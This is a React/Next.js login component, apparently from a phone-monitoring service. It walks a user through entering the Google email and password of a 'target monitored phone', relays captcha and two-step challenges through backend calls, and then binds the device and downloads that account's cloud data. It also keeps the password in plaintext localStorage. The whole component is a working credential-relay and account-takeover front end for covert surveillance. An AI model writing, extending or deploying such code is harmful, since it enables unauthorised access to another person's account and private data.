import styles from './newGcloundLogin.module.scss'
import Image from 'next/image'
import { useTranslation } from 'next-i18next'
import { useEffect, useState } from 'react'
import { googleSignup, googleCodeSubmit, googleStatusQuery, userBindingDevice, gcloudDownload } from 'src/@api/login'
import { Button } from 'antd'
import { TornadoOutlined } from '@mui/icons-material'
import { message } from 'antd'
import { messageInfo } from 'src/components/Message'

const NewGcloudLoing = () => {
  const { t } = useTranslation('androidLogin')

  const [messageApi, contextHolder] = message.useMessage()

  // 是否启动轮询
  const [rotationTraining, setRotationTraining] = useState(false)

  /*
  轮询状态
  1、默认显示用户 NEED_USERNAME
  2、显示密码 NEED_PWD
  3、二步验证 NEED_2SV
  4、成功 SUCCESS
  */

  const [needStatus, setNeedStatus] = useState('NEED_USERNAME')

  // 控制按钮等待状态
  const [loading, setLoading] = useState(false)

  // 显示用户名验证
  const [showUsernameVerify, setShowUsernameVerify] = useState('')

  // 显示机器人验证
  const [showRobotVerify, setShowRobotVerify] = useState('')
  const [showRobotVerifyBase, setShowRobotVerifyBase] = useState('')

  // 显示用户密码验证
  const [showPasswordVerify, setShowPasswordVerify] = useState('')

  // 显示二步验证
  const [showTwosTepVerify, setShowTwosTepVerify] = useState('')

  // 用户名
  const [username, setUsername] = useState('')

  // 用户验证码
  const [usernameVerifyCode, setUsernameVerifyCode] = useState('')

  // 机器人验证
  const [clicked, setClicked] = useState([])

  // 密码
  const [password, setPassword] = useState('')

  // 密码验证码
  const [passwordVerifyCode, setPasswordVerifyCode] = useState('')

  // 正则
  let re = /^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/

  // 提示
  const tips = msg => {
    messageInfo({
      content: msg,
      duration: 4
    })
  }

  const login = () => {
    setLoading(true)

    // setTimeout(() => {
    //   setLoading(false)
    // }, 5000)

    if (needStatus == 'NEED_USERNAME') {
      // 开始走用户模块
      if (showUsernameVerify == '' && showRobotVerify == '') {
        // 校验邮箱
        if (!re.test(username)) {
          tips('E-mail format is incorrect')
          setLoading(false)

          return
        }

        // 提交用户名
        googleSignup({ username })

        // 开启轮询
        startQuery()

        // 提示
        tips('Please wait without leaving this page')
      } else if (showUsernameVerify != '' && showRobotVerify == '') {
        // 用户名和验证码
        googleCodeSubmit({
          username: username,
          ec: 2,
          em: 'ID_CODE',
          extra: {
            tag: 'ID_CODE',
            idCode: usernameVerifyCode
          }
        })
        setShowUsernameVerify('')
      } else if (showUsernameVerify == '' && showRobotVerify != '') {
        // 用户机器人验证
        googleCodeSubmit({
          username: username,
          ec: 2,
          em: 'ROBOT_PARAMS',
          extra: {
            tag: 'ROBOT_PARAMS',
            robotParams: {
              iamgeType: palaceGridType === 3 ? 1 : 2,
              selectedGrids: clicked
            }
          }
        })
        setShowRobotVerify('')
        setClicked([])
      }
    } else if (needStatus == 'NEED_PWD') {
      // 提交密码
      if (password != '' && passwordVerifyCode == '') {
        localStorage.setItem('android-password', password)
        googleCodeSubmit({
          username: username,
          ec: 2,
          em: 'PASSWORD',
          extra: {
            tag: 'PASSWORD',
            password: password
          }
        })
      } else if (password != '' && passwordVerifyCode != '') {
        googleCodeSubmit({
          username: username,
          ec: 2,
          em: 'PWD_CODE',
          extra: {
            tag: 'PWD_CODE',
            idCode: passwordVerifyCode
          }
        })
      }
    }
  }

  // 区分9宫格还是16宫格
  const [palaceGridType, setPalaceGridType] = useState(3)
  const palaceGrid = () => {
    return new Promise((r, j) => {
      setTimeout(() => {
        const robotImg = document.getElementById('robotImg')

        let natural = 3
        if (robotImg && robotImg.naturalWidth === 450) {
          natural = 4
        }
        r(natural)
      }, 1000)
    })
  }

  // 处理机器人图标点击

  const handleRobotImageClick = e => {
    const currentIndex = clicked.indexOf(e)
    if (currentIndex !== -1) {
      setClicked(clicked.filter(row => row != e))
    } else {
      setClicked([...clicked, e])
    }
  }

  // 轮询
  const [intervalId, setIntervalId] = useState(null)
  const startQuery = async () => {
    if (intervalId) {
      clearInterval(intervalId)
    }

    const newIntervalId = setInterval(async () => {
      console.log(12344, 'username:', username, 'needStatus:', needStatus)
      if (username !== '') {
        let result = await googleStatusQuery({ username: username })
        console.log(result, 4488)

        // 用户名验证返回
        // let result = {
        //   code: 0,
        //   data: {
        //     username: '2@gmail.com',
        //     ec: 2,
        //     em: 'NEED_ID_CHECK',
        //     extra: {
        //       tag: 'NEED_ID_CHECK',
        //       imageUrl: '/Captcha.jpg'
        //     }
        //   }
        // }

        // 用户名机器人结构返回
        // let result = {
        //   code: 0,
        //   data: {
        //     username: '222',
        //     ec: 3,
        //     em: 'NEED_ROBOT_CHECK',
        //     extra: {
        //       tag: 'NEED_ROBOT_CHECK',
        //       imageUrl: '/payload.jpg',
        //       imageData:
        //         'data:image/WEBP;base64,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'
        //     }
        //   }
        // }

        // 二步验证
        // let result = {
        //   code: 0,
        //   data: {
        //     username: '2@gmail.com',
        //     ec: 2,
        //     em: 'NEED_2SV',
        //     extra: {
        //       tag: 'NEED_2SV',
        //       imageUrl: '/payload.jpg'
        //     }
        //   }
        // }

        // 验证码错误
        // let result = {
        //   code: 0,
        //   data: {
        //     username: '2@gmail.com',
        //     ec: 2,
        //     em: 'UNKNOWN_ERROR',
        //     extra: {
        //       tag: 'UNKNOWN_ERROR'
        //     }
        //   }
        // }

        //  没有状态或者没有用户不处理
        if (result.data.em == 'USER_NOT_FOUND' || result.data.em == 'UNEXPECTED_STATUS') return

        // 处理用户名验证
        if (result.data.extra.tag === 'NEED_ID_CHECK') {
          setShowUsernameVerify(result.data.extra.imageData)
          setLoading(false)
        }

        // 处理机器人验证
        if (result.data.extra.tag === 'NEED_ROBOT_CHECK') {
          setShowRobotVerify(result.data.extra.imageUrl)
          setShowRobotVerifyBase(result.data.extra.imageData)

          // 给九宫或者16宫格画上边框
          let gridNumber = await palaceGrid()
          setPalaceGridType(gridNumber)
          let robotBox = document.getElementById('robot_box')
          robotBox.style.gridTemplateColumns = `repeat(${gridNumber}, 1fr)`
          robotBox.style.gridTemplateRows = `repeat(${gridNumber}, 1fr)`

          setLoading(false)
        }

        // 进入密码步骤
        if (result.data.extra.tag === 'NEED_PWD') {
          setNeedStatus('NEED_PWD')
          setLoading(false)
        }

        // 处理密码验证
        if (result.data.extra.tag === 'NEED_PWD_CHECK') {
          setShowPasswordVerify(result.data.extra.imageData)
          setLoading(false)
        }

        // 重新跑流程

        if (result.data.extra.tag === 'UNKNOWN_ERROR' || result.data.extra.tag === 'INVALID_ACCOUNT') {
          setNeedStatus('NEED_USERNAME')
          tips('Verification error, please log in again')
          setLoading(false)
        }

        // 回到密码流程
        if (result.data.extra.tag === 'INVALID_ACCOUNT_OR_PASSWORD') {
          setShowPasswordVerify('')
          setPasswordVerifyCode('')
          setNeedStatus('NEED_PWD')
          tips('password err')
          setLoading(false)
        }

        // 二步验证
        if (result.data.extra.tag === 'NEED_2SV') {
          setShowTwosTepVerify(result.data.extra.imageData)
          setNeedStatus('NEED_2SV')
          tips('Please wait without leaving this page')
          setLoading(false)
        }

        // 成功
        if (result.data.extra.tag === 'SUCCESS') {
          setNeedStatus('SUCCESS')
          window.localStorage.setItem('Basic', 1)
          window.localStorage.setItem(
            'DeviceUser',
            JSON.stringify({
              username: `${username}`,
              password: password
            })
          )
          await userBindingDevice({
            username: `${username}`,
            password: localStorage.getItem('android-password') ?? 'no password',
            verify: 1,
            platformType: 'Android-Cloud'
          })
          await gcloudDownload({
            mode: 4,
            username: `${username}`,
            password: localStorage.getItem('android-password') ?? 'no password'
          })
          setLoading(false)
        }
      }
    }, 1000 * 3)

    setIntervalId(newIntervalId)
  }

  onkeydown = e => {
    if (e.keyCode === 13) {
      login()
    }
  }

  return (
    <>
      <div className={styles.dashboard_box}>
        <p className={styles.title}> {t('Connect the target device')}</p>
        <Image style={{ margin: '10px auto' }} src='/images/login/warning.svg' width='36' height='32' alt='img' />
        <p className={styles.tow_step}>
          {t(
            'A two-step verification code will be sent to the target phone from Google official after you click “Connect”.'
          )}
        </p>
        <p className={styles.monitor}>
          {t('Enter Google account of target monitored phone and its code in next page')}

          <p>{t('Where to find the Google account?')}</p>
          <p>
            Settings {'>'} Google (if there's no Google mail signed in there, you can just sign in to your own Google
            mail and turn on backup)
          </p>
          <div style={{ display: 'flex', justifyContent: 'center' }} className='sm:flex-col sm:items-center'>
            <Image
              style={{ margin: '10px ' }}
              src='/images/login/settings-google1.png'
              width='200'
              height='200'
              alt='img'
            />
            <Image
              style={{ margin: '10px ' }}
              src='/images/login/settings-google2.png'
              width='200'
              height='200'
              alt='img'
            />
          </div>
        </p>

        {/* 用户名 */}
        {needStatus == 'NEED_USERNAME' ? (
          <>
            <div className={styles.input_box} style={{ marginTop: '20px', display: 'flex' }}>
              <Image src='/images/login/google.svg' width='16' height='16' alt='img' />
              <input
                className={styles.input}
                placeholder='Google account email'
                onChange={e => setUsername(e.target.value.trim())}
              />
            </div>
            {/* 显示用户验证 */}
            {showUsernameVerify ? (
              <div className={styles.verify_box}>
                <input
                  className={styles.input}
                  placeholder='Verify'
                  onChange={e => setUsernameVerifyCode(e.target.value.trim())}
                />
                <Image width='100' height='60' src={showUsernameVerify} alt='img' />
              </div>
            ) : null}
            {/* 机器人验证 */}
            {showRobotVerify ? (
              <>
                <p style={{ textAlign: 'center', color: '#565555' }}>After verification, please click Next</p>
                <div class={styles.robot_box}>
                  <Image width={318} height={100} style={{ margin: '10px' }} src={showRobotVerifyBase} alt='img' />
                  <div id='robot_box' className={styles.img_border}>
                    <Image id='robotImg' width={300} height={300} src={showRobotVerify} alt='img' />
                    {Array.from({ length: palaceGridType == 3 ? 9 : 16 }).map((row, i) => (
                      <div className={styles.cell} key={i} onClick={() => handleRobotImageClick(i + 1)}>
                        <span
                          style={{
                            width: '20px',
                            height: '20px',
                            background: '#00FE4E',
                            borderRadius: '50%',
                            display: clicked.includes(i + 1) ? 'inline-block' : 'none'
                          }}
                        ></span>
                      </div>
                    ))}
                  </div>
                </div>
              </>
            ) : null}
          </>
        ) : null}

        {/* 密码 */}
        {needStatus == 'NEED_PWD' ? (
          <>
            <div className={styles.input_box} style={{ marginTop: '20px' }}>
              <input
                className={styles.input}
                placeholder='Google account password'
                onChange={e => setPassword(e.target.value.trim())}
              />
            </div>
            {/* 显示密码验证 */}
            {showPasswordVerify ? (
              <div className={styles.verify_box}>
                <input
                  className={styles.input}
                  placeholder='Google account password'
                  onChange={e => setPasswordVerifyCode(e.target.value.trim())}
                />
                <Image width='100' height='60' src={showPasswordVerify} alt='img' />
              </div>
            ) : null}
          </>
        ) : null}

        {/* 二步验证 */}
        {needStatus == 'NEED_2SV' ? (
          <>
            <p style={{ textAlign: 'center', marginTop: '10px', color: '#565555' }}>
              Please tap the same number on the target phone
            </p>
            <div
              style={{
                display: 'flex',
                flexDirection: 'column',
                alignItems: 'center',
                width: '400px',
                margin: 'auto'
              }}
            >
              <Image width={318} height={100} style={{ margin: '10px' }} src={showTwosTepVerify} alt='img' />
            </div>
          </>
        ) : null}

        {/* 成功 */}
        {needStatus == 'SUCCESS' ? (
          <>
            <p style={{ color: '#565555' }}>
              The data is being downloaded, please wait patiently. The first download may take 30 minutes. You can close
              the webpage during this period
            </p>
          </>
        ) : null}

        {/* 下一步 */}
        {needStatus !== 'SUCCESS' ? (
          <Button className={styles.btn} loading={loading} onClick={() => login()}>
            next
          </Button>
        ) : null}
      </div>
      {contextHolder}
    </>
  )
}

export default NewGcloudLoing
